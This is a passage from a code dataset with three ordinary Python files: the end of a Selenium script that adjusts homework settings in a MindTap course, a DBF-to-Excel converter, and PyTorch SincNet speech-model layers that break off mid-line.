editor.click_on_lo(lo_number); time.sleep(1)\r\n \r\n # Click on Exercise Set to display detail\r\n editor.click_on_exercise_set(); time.sleep(3)\r\n \r\n # Extract number of exercises\r\n exercises = editor.get_number_of_exercises(); time.sleep(1)\r\n print('There are {} exercises'.format(len(exercises)))\r\n \r\n ''' 2b. Set homework amount to 1 '''\r\n need_saving = False\r\n for exercise_number in range(1, len(exercises) + 1):\r\n amount = editor.extract_exercise_amount(exercise_number)\r\n if amount == \"0\":\r\n need_saving = True\r\n msg = 'Amount: {}. 
Set it to 1.'.format(amount)\r\n print(msg)\r\n logging.info(' ' + msg)\r\n editor.set_exercise_amount_to_one(exercise_number)\r\n \r\n if need_saving:\r\n editor.click_save_changes()\r\n else:\r\n # Click on Learning Objective again to hide its detail\r\n editor.click_on_lo(lo_number)\r\n \r\n msg = 'Closing assignment editor page'\r\n print(msg)\r\n logging.info(' ' + msg)\r\n time.sleep(1)\r\n driver.refresh()\r\n \r\n\r\nif __name__ == '__main__':\r\n logfile = 'C:/Workspace/Sandbox/log.txt'\r\n if os.path.isfile(logfile): os.remove(logfile)\r\n logging.basicConfig(filename=logfile, level=logging.INFO)\r\n \r\n driver = webdriver.Chrome('C:/Workspace/Tools/drivers/chromedriver.exe')\r\n driver.set_window_size(1650, 1080)\r\n \r\n ''' Login into Mindtap Math Foundation '''\r\n msg = 'Logging into MTMF...'\r\n print(msg)\r\n logging.info(' ' + msg)\r\n login_page.login_mindtap_prod(driver)\r\n \r\n ''' Launch course '''\r\n msg = 'Launching course \"[CLONE] CustomCourse_Master_7-20-2018\" ...'\r\n print(msg)\r\n logging.info(' ' + msg)\r\n home_page = InstructorHomePage(driver)\r\n home_page.launch_course('DEPNSXBPTPG5'); time.sleep(3)\r\n \r\n ''' Extract homework quantity setting '''\r\n set_homework_quantity()\r\n ","sub_path":"DevMathPython/mtmf/course_editor/set_homework_quantity.py","file_name":"set_homework_quantity.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"474462063","text":"from __future__ import print_function\n\nimport sys\n\n\"\"\"\n===========================\nDBF and DF file reader\n===========================\nFile history and credits:\nC. Miller script development 10.08.14\nJ. A. Fonseca adaptation for CEA tool 25.05.16\n\n\"\"\"\n\nimport pysal\nimport numpy as np\nimport pandas as pd\nimport os\n\n\ndef dataframe_to_dbf(df, dbf_path, specs=None):\n if specs is None:\n type2spec = {int: ('N', 20, 0),\n np.int64: ('N', 20, 0),\n float: ('N', 36, 15),\n np.float64: ('N', 36, 15),\n unicode: ('C', 25, 0),\n str: ('C', 25, 0)\n }\n types = [type(df[i].iloc[0]) for i in df.columns]\n specs = [type2spec[t] for t in types]\n dbf = pysal.open(dbf_path, 'w', 'dbf')\n dbf.header = list(df.columns)\n dbf.field_spec = specs\n df_transpose = df.T\n length = len(df_transpose.columns)\n for row in range(length):\n dbf.write(df_transpose[row])\n dbf.close()\n return dbf_path\n\n\ndef dbf_to_dataframe(dbf_path, index=None, cols=False, include_index=False):\n db = pysal.open(dbf_path)\n if cols:\n if include_index:\n cols.append(index)\n vars_to_read = cols\n else:\n vars_to_read = db.header\n data = dict([(var, db.by_col(var)) for var in vars_to_read])\n if index:\n index = db.by_col(index)\n db.close()\n return pd.DataFrame(data, index=index)\n else:\n db.close()\n return pd.DataFrame(data)\n\n\ndef xls_to_dbf(input_path, output_path):\n if not input_path.endswith('.xls'):\n raise ValueError('Excel input file should have *.xls extension')\n\n if not os.path.exists(input_path):\n raise ValueError('Excel input file does not exist')\n\n if not output_path.endswith('.dbf'):\n raise ValueError('DBF output file should have *.dbf extension')\n\n df = pd.read_excel(input_path)\n dataframe_to_dbf(df, output_path)\n\n\ndef dbf_to_xls(input_path, output_path):\n if not input_path.endswith('.dbf'): # check if the extension of the input is dbf\n raise ValueError('DBF input file should have *.dbf extension')\n\n if not os.path.exists(input_path):\n raise ValueError('DBF input file does not 
exist')\n\n if not output_path.endswith('.xls'): # check if the extension of the input is xls\n raise ValueError('Excel output file should have *.xls extension')\n\n df = dbf_to_dataframe(input_path)\n df.to_excel(output_path)\n\n\ndef run_as_script(input_path, output_path):\n if input_path.endswith('.dbf'):\n dbf_to_xls(input_path=input_path, output_path=output_path)\n elif input_path.endswith('.xls'):\n xls_to_dbf(input_path=input_path, output_path=output_path)\n else:\n print('input file type not supported')\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--input-path')\n parser.add_argument('--output-path')\n args = parser.parse_args()\n run_as_script(input_path=args.input_path, output_path=args.output_path)\n","sub_path":"cea/utilities/dbfreader.py","file_name":"dbfreader.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"95404009","text":"import numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport sys\nfrom torch.autograd import Variable\nimport math\n\ndef flip(x, dim):\n\txsize = x.size()\n\tdim = x.dim() + dim if dim < 0 else dim\n\tx = x.contiguous()\n\tx = x.view(-1, *xsize[dim:])\n\tx = x.view(x.size(0), x.size(1), -1)[:, getattr(torch.arange(x.size(1)-1, \n\t\t\t\t\t\t\t\t\t\t-1, -1), ('cpu','cuda')[x.is_cuda])().long(), :]\n\treturn x.view(xsize)\n\n\ndef sinc(band,t_right):\n\ty_right= torch.sin(2*math.pi*band*t_right)/(2*math.pi*band*t_right)\n\ty_left= flip(y_right,0)\n\n\ty=torch.cat([y_left,Variable(torch.ones(1)).cuda(),y_right])\n\n\treturn y\n\t\t\n\nclass SincConv_fast(nn.Module):\n\t\"\"\"Sinc-based convolution\n\tParameters\n\t----------\n\tin_channels : `int`\n\t\t\tNumber of input channels. Must be 1.\n\tout_channels : `int`\n\t\t\tNumber of filters.\n\tkernel_size : `int`\n\t\t\tFilter length.\n\tsample_rate : `int`, optional\n\t\t\tSample rate. 
Defaults to 16000.\n\tUsage\n\t-----\n\tSee `torch.nn.Conv1d`\n\tReference\n\t---------\n\tMirco Ravanelli, Yoshua Bengio,\n\t\"Speaker Recognition from raw waveform with SincNet\".\n\thttps://arxiv.org/abs/1808.00158\n\t\"\"\"\n\n\t@staticmethod\n\tdef to_mel(hz):\n\t\treturn 2595 * np.log10(1 + hz / 700)\n\n\t@staticmethod\n\tdef to_hz(mel):\n\t\treturn 700 * (10 ** (mel / 2595) - 1)\n\n\tdef __init__(self, out_channels, kernel_size, sample_rate, in_channels=1,\n\t\t\t\t\t\t\t stride=1, padding=0, dilation=1, bias=False, groups=1, min_low_hz=50, min_band_hz=50):\n\n\t\tsuper(SincConv_fast,self).__init__()\n\n\t\tif in_channels != 1:\n\t\t\t#msg = (f'SincConv only support one input channel '\n\t\t\t# f'(here, in_channels = {in_channels:d}).')\n\t\t\tmsg = \"SincConv only support one input channel (here, in_channels = {%i})\" % (in_channels)\n\t\t\traise ValueError(msg)\n\n\t\tself.out_channels = out_channels\n\t\tself.kernel_size = kernel_size\n\t\t\n\t\t# Forcing the filters to be odd (i.e, perfectly symmetrics)\n\t\tif kernel_size%2==0:\n\t\t\tself.kernel_size=self.kernel_size+1\n\t\t\t\t\n\t\tself.stride = stride\n\t\tself.padding = padding\n\t\tself.dilation = dilation\n\n\t\tif bias:\n\t\t\traise ValueError('SincConv does not support bias.')\n\t\tif groups > 1:\n\t\t\traise ValueError('SincConv does not support groups.')\n\n\t\tself.sample_rate = sample_rate\n\t\tself.min_low_hz = min_low_hz\n\t\tself.min_band_hz = min_band_hz\n\n\t\t# initialize filterbanks such that they are equally spaced in Mel scale\n\t\tlow_hz = 30\n\t\thigh_hz = self.sample_rate / 2 - (self.min_low_hz + self.min_band_hz)\n\n\t\tmel = np.linspace(self.to_mel(low_hz),\n\t\t\t\t\t\t\t\t\t\t\tself.to_mel(high_hz),\n\t\t\t\t\t\t\t\t\t\t\tself.out_channels + 1)\n\t\thz = self.to_hz(mel)\n\t\t\n\n\t\t# filter lower frequency (out_channels, 1)\n\t\tself.low_hz_ = nn.Parameter(torch.Tensor(hz[:-1]).view(-1, 1))\n\n\t\t# filter frequency band (out_channels, 1)\n\t\tself.band_hz_ = nn.Parameter(torch.Tensor(np.diff(hz)).view(-1, 1))\n\n\t\t# Hamming window\n\t\t#self.window_ = torch.hamming_window(self.kernel_size)\n\t\tn_lin=torch.linspace(0, (self.kernel_size/2)-1, steps=int((self.kernel_size/2))) # computing only half of the window\n\t\tself.window_=0.54-0.46*torch.cos(2*math.pi*n_lin/self.kernel_size);\n\n\n\t\t# (kernel_size, 1)\n\t\tn = (self.kernel_size - 1) / 2.0\n\t\tself.n_ = 2*math.pi*torch.arange(-n, 0).view(1, -1) / self.sample_rate # Due to symmetry, I only need half of the time axes\n\n\n\n\n\tdef forward(self, waveforms):\n\t\t\"\"\"\n\t\tParameters\n\t\t----------\n\t\twaveforms : `torch.Tensor` (batch_size, 1, n_samples)\n\t\t\t\tBatch of waveforms.\n\t\tReturns\n\t\t-------\n\t\tfeatures : `torch.Tensor` (batch_size, out_channels, n_samples_out)\n\t\t\t\tBatch of sinc filters activations.\n\t\t\"\"\"\n\n\t\tself.n_ = self.n_.to(waveforms.device)\n\n\t\tself.window_ = self.window_.to(waveforms.device)\n\n\t\tlow = self.min_low_hz + torch.abs(self.low_hz_)\n\t\t\n\t\thigh = torch.clamp(low + self.min_band_hz + torch.abs(self.band_hz_),self.min_low_hz,self.sample_rate/2)\n\t\tband=(high-low)[:,0]\n\t\t\n\t\tf_times_t_low = torch.matmul(low, self.n_)\n\t\tf_times_t_high = torch.matmul(high, self.n_)\n\n\t\tband_pass_left=((torch.sin(f_times_t_high)-torch.sin(f_times_t_low))/(self.n_/2))*self.window_ # Equivalent of Eq.4 of the reference paper (SPEAKER RECOGNITION FROM RAW WAVEFORM WITH SINCNET). I just have expanded the sinc and simplified the terms. This way I avoid several useless computations. 
\n\t\tband_pass_center = 2*band.view(-1,1)\n\t\tband_pass_right= torch.flip(band_pass_left,dims=[1])\n\t\t\n\t\t\n\t\tband_pass=torch.cat([band_pass_left,band_pass_center,band_pass_right],dim=1)\n\n\t\t\n\t\tband_pass = band_pass / (2*band[:,None])\n\t\t\n\n\t\tself.filters = (band_pass).view(\n\t\t\t\tself.out_channels, 1, self.kernel_size)\n\n\t\treturn F.conv1d(waveforms, self.filters, stride=self.stride,\n\t\t\t\t\t\t\t\t\t\tpadding=self.padding, dilation=self.dilation,\n\t\t\t\t\t\t\t\t\t\t bias=None, groups=1) \n\n\n\t\t\t\t\n\t\t\t\t\nclass sinc_conv(nn.Module):\n\n\tdef __init__(self, N_filt,Filt_dim,fs):\n\t\tsuper(sinc_conv,self).__init__()\n\n\t\t# Mel Initialization of the filterbanks\n\t\tlow_freq_mel = 80\n\t\thigh_freq_mel = (2595 * np.log10(1 + (fs / 2) / 700)) # Convert Hz to Mel\n\t\tmel_points = np.linspace(low_freq_mel, high_freq_mel, N_filt) # Equally spaced in Mel scale\n\t\tf_cos = (700 * (10**(mel_points / 2595) - 1)) # Convert Mel to Hz\n\t\tb1=np.roll(f_cos,1)\n\t\tb2=np.roll(f_cos,-1)\n\t\tb1[0]=30\n\t\tb2[-1]=(fs/2)-100\n\t\t\t\t\t\t\n\t\tself.freq_scale=fs*1.0\n\t\tself.filt_b1 = nn.Parameter(torch.from_numpy(b1/self.freq_scale))\n\t\tself.filt_band = nn.Parameter(torch.from_numpy((b2-b1)/self.freq_scale))\n\n\t\t\n\t\tself.N_filt=N_filt\n\t\tself.Filt_dim=Filt_dim\n\t\tself.fs=fs\n\t\t\t\t\n\n\tdef forward(self, x):\n\t\t\t\n\t\tfilters=Variable(torch.zeros((self.N_filt,self.Filt_dim))).cuda()\n\t\tN=self.Filt_dim\n\t\tt_right=Variable(torch.linspace(1, (N-1)/2, steps=int((N-1)/2))/self.fs).cuda()\n\t\t\n\t\t\n\t\tmin_freq=50.0;\n\t\tmin_band=50.0;\n\t\t\n\t\tfilt_beg_freq=torch.abs(self.filt_b1)+min_freq/self.freq_scale\n\t\tfilt_end_freq=filt_beg_freq+(torch.abs(self.filt_band)+min_band/self.freq_scale)\n\t \n\t\tn=torch.linspace(0, N, steps=N)\n\n\t\t# Filter window (hamming)\n\t\twindow=0.54-0.46*torch.cos(2*math.pi*n/N);\n\t\twindow=Variable(window.float().cuda())\n\n\t\t\n\t\tfor i in range(self.N_filt):\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\tlow_pass1 = 2*filt_beg_freq[i].float()*sinc(filt_beg_freq[i].float()*self.freq_scale,t_right)\n\t\t\t\tlow_pass2 = 2*filt_end_freq[i].float()*sinc(filt_end_freq[i].float()*self.freq_scale,t_right)\n\t\t\t\tband_pass=(low_pass2-low_pass1)\n\n\t\t\t\tband_pass=band_pass/torch.max(band_pass)\n\n\t\t\t\tfilters[i,:]=band_pass.cuda()*window\n\n\t\tout=F.conv1d(x, filters.view(self.N_filt,1,self.Filt_dim))\n\n\t\treturn out\n\t\t\n\ndef act_fun(act_type):\n\tif act_type==\"softplus\":\n\t\treturn nn.Softplus()\n\n\tif act_type==\"relu\":\n\t\treturn nn.ReLU()\n\t\t\t\t\t\t\n\tif act_type==\"tanh\":\n\t\treturn nn.Tanh()\n\t\t\t\t\t\t\n\tif act_type==\"sigmoid\":\n\t\treturn nn.Sigmoid()\n\t\t\t\t\t \n\tif act_type==\"leaky_relu\":\n\t\treturn nn.LeakyReLU(0.2)\n\t\t\t\t\t\t\n\tif act_type==\"elu\":\n\t\treturn nn.ELU()\n\t\t\t\t\t\t\t\t\t\t \n\tif act_type==\"softmax\":\n\t\treturn nn.LogSoftmax(dim=1)\n\t\t\t\t\n\tif act_type==\"linear\":\n\t\treturn nn.LeakyReLU(1) # initializzed like this, but not used in forward!\n\t\t\t\t\t\t\n\t\t\t\t\t\t\nclass LayerNorm(nn.Module):\n\tdef __init__(self, features, eps=1e-6):\n\t\tsuper(LayerNorm,self).__init__()\n\t\tself.gamma = nn.Parameter(torch.ones(features))\n\t\tself.beta = nn.Parameter(torch.zeros(features))\n\t\tself.eps = eps\n\n\tdef forward(self, x):\n\t\tmean = x.mean(-1, keepdim=True)\n\t\tstd = x.std(-1, keepdim=True)\n\t\treturn self.gamma * (x - mean) / (std + self.eps) + self.beta\n\n\nclass MLP(nn.Module):\n\tdef __init__(self, options):\n\t\tsuper(MLP, 
self).__init__()\n\t\t\n\t\tself.input_dim=int(options['input_dim'])\n\t\tself.fc_lay=options['fc_lay']\n\t\tself.fc_drop=options['fc_drop']\n\t\tself.fc_use_batchnorm=options['fc_use_batchnorm']\n\t\tself.fc_use_laynorm=options['fc_use_laynorm']\n\t\tself.fc_use_laynorm_inp=options['fc_use_laynorm_inp']\n\t\tself.fc_use_batchnorm_inp=options['fc_use_batchnorm_inp']\n\t\tself.fc_act=options['fc_act']\n\t\t\n\t \n\t\tself.wx = nn.ModuleList([])\n\t\tself.bn = nn.ModuleList([])\n\t\tself.ln = nn.ModuleList([])\n\t\tself.act = nn.ModuleList([])\n\t\tself.drop = nn.ModuleList([])\n\t \n\n\t \n\t\t# input layer normalization\n\t\tif self.fc_use_laynorm_inp:\n\t\t\tself.ln0=LayerNorm(self.input_dim)\n\t\t\t\n\t\t# input batch normalization \n\t\tif self.fc_use_batchnorm_inp:\n\t\t\tself.bn0=nn.BatchNorm1d([self.input_dim],momentum=0.05)\n\t\t\t \n\t\t\t \n\t\tself.N_fc_lay=len(self.fc_lay)\n\t\t\t\t \n\t\tcurrent_input=self.input_dim\n\t\t\n\t\t# Initialization of hidden layers\n\t\t\n\t\tfor i in range(self.N_fc_lay):\n\t\t\t# dropout\n\t\t\tself.drop.append(nn.Dropout(p=self.fc_drop[i]))\n\t\t\n\t\t\t# activation\n\t\t\tself.act.append(act_fun(self.fc_act[i]))\n\t\t\t \n\t\t\t \n\t\t\tadd_bias=True\n\t\t\t \n\t\t\t# layer norm initialization\n\t\t\tself.ln.append(LayerNorm(self.fc_lay[i]))\n\t\t\tself.bn.append(nn.BatchNorm1d(self.fc_lay[i],momentum=0.05))\n\t\t\t \n\t\t\tif self.fc_use_laynorm[i] or self.fc_use_batchnorm[i]:\n\t\t\t\tadd_bias=False\n\t\t\t \n\t\t\t\t\t\t\n\t\t\t# Linear operations\n\t\t\tself.wx.append(nn.Linear(current_input, self.fc_lay[i],bias=add_bias))\n\t\t\t \n\t\t\t# weight initialization\n\t\t\tself.wx[i].weight = torch.nn.Parameter(torch.Tensor(self.fc_lay[i],current_input).uniform_(-np.sqrt(0.01/(current_input+self.fc_lay[i])),np.sqrt(0.01/(current_input+self.fc_lay[i]))))\n\t\t\tself.wx[i].bias = torch.nn.Parameter(torch.zeros(self.fc_lay[i]))\n\t\t\t \n\t\t\tcurrent_input=self.fc_lay[i]\n\t\t\t \n\t\t\t \n\tdef forward(self, x):\n\n\t\t\t\n\t\t# Applying Layer/Batch Norm\n\t\tif bool(self.fc_use_laynorm_inp):\n\t\t\tx=self.ln0((x))\n\t\t\t\n\t\tif bool(self.fc_use_batchnorm_inp):\n\t\t\tx=self.bn0((x))\n\t\t\t\n\t\tfor i in range(self.N_fc_lay):\n\n\t\t\tif self.fc_act[i]!='linear':\n\t\t\t\t\t\n\t\t\t\tif self.fc_use_laynorm[i]:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.ln[i](self.wx[i](x))))\n\t\t\t\t\n\t\t\t\tif self.fc_use_batchnorm[i]:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.bn[i](self.wx[i](x))))\n\t\t\t\t\n\t\t\t\tif self.fc_use_batchnorm[i]==False and self.fc_use_laynorm[i]==False:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.wx[i](x)))\n\t\t\t\t \n\t\t\telse:\n\t\t\t\tif self.fc_use_laynorm[i]:\n\t\t\t\t\tx = self.drop[i](self.ln[i](self.wx[i](x)))\n\t\t\t\t\n\t\t\t\tif self.fc_use_batchnorm[i]:\n\t\t\t\t\tx = self.drop[i](self.bn[i](self.wx[i](x)))\n\t\t\t\t\n\t\t\t\tif self.fc_use_batchnorm[i]==False and self.fc_use_laynorm[i]==False:\n\t\t\t\t\tx = self.drop[i](self.wx[i](x)) \n\t\t\t\t\n\t\treturn x\n\n\nclass MLP_for_me(nn.Module):\n\tdef __init__(self, options):\n\t\tsuper(MLP_for_me, self).__init__()\n\t\t\n\t\tself.input_dim=int(options['input_dim'])\n\t\tself.fc_lay=options['fc_lay']\n\t\tself.fc_drop=options['fc_drop']\n\t\tself.fc_use_batchnorm=options['fc_use_batchnorm']\n\t\tself.fc_use_laynorm=options['fc_use_laynorm']\n\t\tself.fc_use_laynorm_inp=options['fc_use_laynorm_inp']\n\t\tself.fc_use_batchnorm_inp=options['fc_use_batchnorm_inp']\n\t\tself.fc_act=options['fc_act']\n\t\t\n\t \n\t\tself.wx = nn.ModuleList([])\n\t\tself.bn = 
nn.ModuleList([])\n\t\tself.ln = nn.ModuleList([])\n\t\tself.act = nn.ModuleList([])\n\t\tself.drop = nn.ModuleList([])\n\t \n\n\t \n\t\t# input layer normalization\n\t\tif self.fc_use_laynorm_inp:\n\t\t\tself.ln0=LayerNorm(self.input_dim)\n\t\t\t\n\t\t# input batch normalization \n\t\tif self.fc_use_batchnorm_inp:\n\t\t\tself.bn0=nn.BatchNorm1d(self.input_dim,momentum=0.05)\n\t\t\t \n\t\t\t \n\t\tself.N_fc_lay=len(self.fc_lay)\n\t\t\t\t \n\t\tcurrent_input=self.input_dim\n\t\t\n\t\t# Initialization of hidden layers\n\t\t\n\t\tfor i in range(self.N_fc_lay):\n\t\t\t# dropout\n\t\t\tself.drop.append(nn.Dropout(p=self.fc_drop[i]))\n\t\t\n\t\t\t# activation\n\t\t\tself.act.append(act_fun(self.fc_act[i]))\n\n\t\t\tadd_bias=True\n\t\t\t \n\t\t\t# layer norm initialization\n\t\t\tself.ln.append(LayerNorm(self.fc_lay[i]))\n\t\t\tself.bn.append(nn.BatchNorm1d(self.fc_lay[i],momentum=0.05))\n\t\t\t \n\t\t\tif self.fc_use_laynorm[i] or self.fc_use_batchnorm[i]:\n\t\t\t\tadd_bias=False\n\t\t\t \n\t\t\t\t\t\t\n\t\t\t# Linear operations\n\t\t\tself.wx.append(nn.Linear(current_input, self.fc_lay[i],bias=add_bias))\n\t\t\t \n\t\t\t# weight initialization\n\t\t\tself.wx[i].weight = torch.nn.Parameter(torch.Tensor(self.fc_lay[i],current_input).uniform_(-np.sqrt(0.01/(current_input+self.fc_lay[i])),np.sqrt(0.01/(current_input+self.fc_lay[i]))))\n\t\t\tself.wx[i].bias = torch.nn.Parameter(torch.zeros(self.fc_lay[i]))\n\t\t\t \n\t\t\tcurrent_input=self.fc_lay[i]\n\t\t\t \n\t\t\t \n\tdef forward(self, x):\t\n\t\t# Applying Layer/Batch Norm\n\t\tif bool(self.fc_use_laynorm_inp):\n\t\t\tx=self.ln0((x))\n\t\t\t\n\t\tif bool(self.fc_use_batchnorm_inp):\n\t\t\tx=self.bn0(x.transpose(-1, -2)).transpose(-1, -2)\n\t\t\n\t\tfor i in range(self.N_fc_lay):\n\n\t\t\tif self.fc_act[i]!='linear':\n\t\t\t\tif self.fc_use_laynorm[i]:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.ln[i](self.wx[i](x))))\n\t\t\t\t\n\t\t\t\telif self.fc_use_batchnorm[i]:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.bn[i](self.wx[i](x).transpose(-1, -2)).transpose(-1, -2)))\n\n\t\t\t\telif self.fc_use_batchnorm[i]==False and self.fc_use_laynorm[i]==False:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.wx[i](x)))\n\t\t\t\t \n\t\t\telse:\n\t\t\t\tif self.fc_use_laynorm[i]:\n\t\t\t\t\tx = self.drop[i](self.ln[i](self.wx[i](x)))\n\t\t\t\t\n\t\t\t\tif self.fc_use_batchnorm[i]:\n\t\t\t\t\tx = self.drop[i](self.bn[i](self.wx[i](x).transpose(-1, -2)).transpose(-1, -2))\n\t\t\t\t\n\t\t\t\tif self.fc_use_batchnorm[i]==False and self.fc_use_laynorm[i]==False:\n\t\t\t\t\tx = self.drop[i](self.wx[i](x)) \n\t\t\n\t\treturn x\n\n\nclass SincNet(nn.Module):\n\t\t\n\tdef __init__(self,options):\n\t\tsuper(SincNet,self).__init__()\n\t\n\t\tself.cnn_N_filt=options['cnn_N_filt']\n\t\tself.cnn_len_filt=options['cnn_len_filt']\n\t\tself.cnn_max_pool_len=options['cnn_max_pool_len']\n\t\t \n\t\t \n\t\tself.cnn_act=options['cnn_act']\n\t\tself.cnn_drop=options['cnn_drop']\n\t\t \n\t\tself.cnn_use_laynorm=options['cnn_use_laynorm']\n\t\tself.cnn_use_batchnorm=options['cnn_use_batchnorm']\n\t\tself.cnn_use_laynorm_inp=options['cnn_use_laynorm_inp']\n\t\tself.cnn_use_batchnorm_inp=options['cnn_use_batchnorm_inp']\n\t\t \n\t\tself.input_dim=int(options['input_dim'])\n\t\t \n\t\tself.fs=options['fs']\n\t\t \n\t\tself.N_cnn_lay=len(options['cnn_N_filt'])\n\t\tself.conv = nn.ModuleList([])\n\t\tself.bn = nn.ModuleList([])\n\t\tself.ln = nn.ModuleList([])\n\t\tself.act = nn.ModuleList([])\n\t\tself.drop = nn.ModuleList([])\n\t\t \n\t\t\t\t\t \n\t\tif 
self.cnn_use_laynorm_inp:\n\t\t\tself.ln0=LayerNorm(self.input_dim)\n\t\t\t\t \n\t\tif self.cnn_use_batchnorm_inp:\n\t\t\tself.bn0=nn.BatchNorm1d([self.input_dim],momentum=0.05)\n\t\t\t\t \n\t\tcurrent_input=self.input_dim \n\t\t \n\t\tfor i in range(self.N_cnn_lay):\n\t\t\t \n\t\t\tN_filt=int(self.cnn_N_filt[i])\n\t\t\tlen_filt=int(self.cnn_len_filt[i])\n\t\t\t \n\t\t\t# dropout\n\t\t\tself.drop.append(nn.Dropout(p=self.cnn_drop[i]))\n\t\t\t \n\t\t\t# activation\n\t\t\tself.act.append(act_fun(self.cnn_act[i]))\n\t\t\t\t\t\t\t\t\t\n\t\t\t# layer norm initialization \n\t\t\tself.ln.append(LayerNorm([N_filt,int((current_input-self.cnn_len_filt[i]+1)/self.cnn_max_pool_len[i])]))\n\n\t\t\tself.bn.append(nn.BatchNorm1d(N_filt,int((current_input-self.cnn_len_filt[i]+1)/self.cnn_max_pool_len[i]),momentum=0.05))\n\t\t\t\t\t\n\n\t\t\tif i==0:\n\t\t\t\tself.conv.append(SincConv_fast(self.cnn_N_filt[0],self.cnn_len_filt[0],self.fs))\n\t\t\t\t\t\t\n\t\t\telse:\n\t\t\t\tself.conv.append(nn.Conv1d(self.cnn_N_filt[i-1], self.cnn_N_filt[i], self.cnn_len_filt[i]))\n\t\t\t\t\n\t\t\tcurrent_input=int((current_input-self.cnn_len_filt[i]+1)/self.cnn_max_pool_len[i])\n\n\t\t\t \n\t\tself.out_dim=current_input*N_filt\n\n\n\n\tdef forward(self, x):\n\t\tbatch=x.shape[0]\n\t\tseq_len=x.shape[1]\n\t\t \n\t\tif bool(self.cnn_use_laynorm_inp):\n\t\t\tx=self.ln0((x))\n\t\t\t\n\t\tif bool(self.cnn_use_batchnorm_inp):\n\t\t\tx=self.bn0((x))\n\t\t\t\n\t\tx=x.view(batch,1,seq_len)\n\n\t\t \n\t\tfor i in range(self.N_cnn_lay):\n\t\t\t\t \n\t\t\tif self.cnn_use_laynorm[i]:\n\t\t\t\tif i==0:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.ln[i](F.max_pool1d(torch.abs(self.conv[i](x)), self.cnn_max_pool_len[i])))) \n\t\t\t\telse:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.ln[i](F.max_pool1d(self.conv[i](x), self.cnn_max_pool_len[i])))) \n\t\t\t\t\n\t\t\tif self.cnn_use_batchnorm[i]:\n\t\t\t\tx = self.drop[i](self.act[i](self.bn[i](F.max_pool1d(self.conv[i](x), self.cnn_max_pool_len[i]))))\n\n\t\t\tif self.cnn_use_batchnorm[i]==False and self.cnn_use_laynorm[i]==False:\n\t\t\t\tx = self.drop[i](self.act[i](F.max_pool1d(self.conv[i](x), self.cnn_max_pool_len[i])))\n\n\t\t \n\t\tx = x.view(batch,-1)\n\n\t\treturn x\n\nclass ConvNet(nn.Module):\n\t\t\n\tdef __init__(self,options):\n\t\tsuper(ConvNet,self).__init__()\n\t\n\t\tself.cnn_N_filt=options['cnn_N_filt']\n\t\tself.cnn_len_filt=options['cnn_len_filt']\n\t\tself.cnn_max_pool_len=options['cnn_max_pool_len']\n\t\t \n\t\t \n\t\tself.cnn_act=options['cnn_act']\n\t\tself.cnn_drop=options['cnn_drop']\n\t\t \n\t\tself.cnn_use_laynorm=options['cnn_use_laynorm']\n\t\tself.cnn_use_batchnorm=options['cnn_use_batchnorm']\n\t\tself.cnn_use_laynorm_inp=options['cnn_use_laynorm_inp']\n\t\tself.cnn_use_batchnorm_inp=options['cnn_use_batchnorm_inp']\n\t\t \n\t\tself.input_dim=int(options['input_dim'])\n\t\t \n\t\tself.fs=options['fs']\n\t\t \n\t\tself.N_cnn_lay=len(options['cnn_N_filt'])\n\t\tself.conv = nn.ModuleList([])\n\t\tself.bn = nn.ModuleList([])\n\t\tself.ln = nn.ModuleList([])\n\t\tself.act = nn.ModuleList([])\n\t\tself.drop = nn.ModuleList([])\n\t\t \n\t\t\t\t\t \n\t\tif self.cnn_use_laynorm_inp:\n\t\t\tself.ln0=LayerNorm(self.input_dim)\n\t\t\t\t \n\t\tif self.cnn_use_batchnorm_inp:\n\t\t\tself.bn0=nn.BatchNorm1d([self.input_dim],momentum=0.05)\n\t\t\t\t \n\t\tcurrent_input=self.input_dim \n\t\t \n\t\tfor i in range(self.N_cnn_lay):\n\t\t\t \n\t\t\tN_filt=int(self.cnn_N_filt[i])\n\t\t\tlen_filt=int(self.cnn_len_filt[i])\n\t\t\t \n\t\t\t# 
dropout\n\t\t\tself.drop.append(nn.Dropout(p=self.cnn_drop[i]))\n\t\t\t \n\t\t\t# activation\n\t\t\tself.act.append(act_fun(self.cnn_act[i]))\n\t\t\t\t\t\t\t\t\t\n\t\t\t# layer norm initialization \n\t\t\tself.ln.append(LayerNorm([N_filt,int((current_input-self.cnn_len_filt[i]+1)/self.cnn_max_pool_len[i])]))\n\n\t\t\tself.bn.append(nn.BatchNorm1d(N_filt,int((current_input-self.cnn_len_filt[i]+1)/self.cnn_max_pool_len[i]),momentum=0.05))\n\t\t\t\t\t\n\n\t\t\tif i==0:\n\t\t\t\tself.conv.append(nn.Conv1d(8, self.cnn_N_filt[i], self.cnn_len_filt[i]))\n\t\t\t\t\t\t\n\t\t\telse:\n\t\t\t\tself.conv.append(nn.Conv1d(self.cnn_N_filt[i-1], self.cnn_N_filt[i], self.cnn_len_filt[i]))\n\t\t\t\t\n\t\t\tcurrent_input=int((current_input-self.cnn_len_filt[i]+1)/self.cnn_max_pool_len[i])\n\n\t\t\t \n\t\tself.out_dim=current_input*N_filt\n\n\n\n\tdef forward(self, x):\n\t\tx = x.transpose(1, 2)\n\t\tbatch=x.shape[0]\n\t\tseq_len=x.shape[1]\n\t\t \n\t\tif bool(self.cnn_use_laynorm_inp):\n\t\t\tx=self.ln0((x))\n\t\t\t\n\t\tif bool(self.cnn_use_batchnorm_inp):\n\t\t\tx=self.bn0((x))\n\t\t\n\t\tx=x.view(batch,1,seq_len)\n\t\t \n\t\tfor i in range(self.N_cnn_lay):\n\t\t\t\t \n\t\t\tif self.cnn_use_laynorm[i]:\n\t\t\t\tx = self.drop[i](self.act[i](self.ln[i](F.max_pool1d(self.conv[i](x), 